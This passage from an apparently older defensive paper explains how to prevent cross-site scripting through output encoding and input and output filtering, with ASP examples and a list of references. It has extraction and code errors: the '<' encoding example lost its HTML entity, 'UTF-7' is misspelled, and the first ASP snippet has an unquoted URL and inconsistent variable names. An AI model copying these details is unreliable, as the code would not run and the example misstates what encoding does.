Filter output based upon input parameters for special characters. Applying the appropriate solution efficiently is dependant upon the language used to code the server-side application. Depending upon the application, and the particular phase of operation, it may be necessary to use different techniques to handle the special characters. In most instances input or output filtering will be sufficient. However, if particular client data submissions are likely to contain special characters (e.g. a complex database search query), it may be necessary to encode the resultant data for presentation back to the client. Encode output based upon input parameters In this method, any non-validated user data is always encoded to the appropriate HTML characters as it is written back to the user. For instance the character “<“ would be encoded as “<” and, although appearing to the user as the less-than character, would not be interpreted by the client application as the start of a HTML tag. If a web page uses the UFT-7 character encoding, there are several different strings which will act as a ‘<’ character and start an HTML tag; all of these strings start with a ‘+’. It is also important that the use of the”%” encoding character be carefully monitored, as it can be used to escape-encode or Unicode special characters that will be correctly interpreted the client web browser. There are many methods of encoding text and special characters. A detailed analysis can be found in the earlier paper, “URL Encoded Attacks”. Encode output based upon input parameters Microsoft Active Server Pages <%

var BaseURL = http://www.mysite.com/search2.asp?searchagain=;Response.write

("<a href=\"" + BaseUrl + Server.URLEncode(Request.QueryString("SearchString")) +

"\">click-me</a>");

%>

<% Response.Write("Hello visitor <I>" +

Server.HTMLEncode(Request.Form("UserName")) +

"</I>"); %> With Microsoft’s ASP, the HTMLEncode call will automatically prevent any script in it from being executed. Filter input parameters for special characters. Input filtering works by removing some or all special characters from user supplied data as it reaches the server-side application components. Although it is possible to implement client-side input filtering, this should never be relied upon as it is often a trivial exercise for an attacker to bypass it. Even if implemented at the client-side, the server-side processes should carry out the same input filtering processes. The recommended method of implementing input filtering is to only select from the set of characters that is known to be safe rather than excluding the named special characters. This method is referred to as Positive filtering, and by only selecting the characters that are acceptable, it will help to reduce the ability to exploit other yet unknown vulnerabilities. For example, a form field that is expecting a person's age can be limited to the set of digits 0 through 9. There is no reason for this age element to accept any letters or other special characters. Filter output based upon input parameters for special characters Output filtering functions similarly to Input filtering, except that special characters are filtered from the data at the server-side application before being sent to the client web browser. This technique should be used when data is retrieved from databases or storage formats, particularly when there is a probability that non-filtered content could have been added by other applications or system processes. Special care should be taken when using Output filtering. If the application outputs HTML content, vigilance is required to ensure that special character filtering is restricted to data that has been previously supplied by a user and stored in a database. Filtering the special characters “<“ and “>“ too early in the process is likely to render the client HTML document useless. References “Malicious HTML Tags Embedded in Client Web Requests”, CERT® Advisory CA-2000-02, February 3 2002 “Bypassing JavaScript Filters – the Flash! attack”, EyeonSecurity, June 5 2002 “The HTML Form Protocol Attack”, Jochen Topf, August 8 2001 “HOWTO: Prevent Cross-Site Scripting Security Issues (Q252985)”, Microsoft, February 1 2000 “Understanding Malicious Content Mitigation for Web Developers”, CERT Coordination Center, February 2 2000 “URL Encoded Attacks”, Internet Security Systems, Gunter Ollmann, April 1 2002 “Cross-site Scripting Overview”, Microsoft, February 2 2000 “The Evolution of Cross-site Scripting Attacks”, iDefence, David Edler, May 20 2002